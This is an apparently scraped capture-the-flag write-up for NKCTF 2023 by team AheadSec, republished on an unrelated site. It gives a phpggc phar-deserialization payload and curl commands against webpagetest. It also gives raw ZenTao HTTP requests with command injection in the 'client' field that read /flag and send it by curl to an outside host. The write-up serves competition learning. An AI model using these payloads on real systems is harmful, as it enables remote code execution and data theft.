NKCTF 2023 Writeup By AheadSec |
您所在的位置:网站首页 › write软件 › NKCTF 2023 Writeup By AheadSec |
感谢战队的每位同学,辛苦啦~ Web: Nacl、monkey111 Misc: Nacl、mochu7 Socal Engineering: Nacl、monkey111、mochu7 Crypto: range Pwn: gwoo、Helen Reverse: Helen webpagetest反序列化 首先下载 https://github.com/ambionics/phpggc.git 然后需要去更改php.ini [Phar] phar.readonly => Off然后生成 ./phpggc Monolog/RCE2 system 'cat /f*' -p phar -o testinfo.ini URLENC_PAYLOAD=$(cat /tmp/testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%g") curl -sSkig 'http://d44a0e24-e51d-4dae-976f-7583b5bcb409.node2.yuzhian.com.cn/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o - curl -sSkig 'http://d44a0e24-e51d-4dae-976f-7583b5bcb409.node2.yuzhian.com.cn/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -上面的命令一定要按顺序执行,并且不能报错 获取cookie POST /repo-create.html HTTP/1.1 Host: b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000//repo-edit-1-0.html Content-Length: 111 product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=执行命令。回显长度不够,利用curl外带进行回显 POST /repo-edit-10000-10000.html HTTP/1.1 Host: b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000//repo-edit-1-0.html Content-Length: 85 SCM=Subversion&client=`curl 1x.x.x.x:8080/\`cat /flag | sed -n '2p' | base64\`` |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |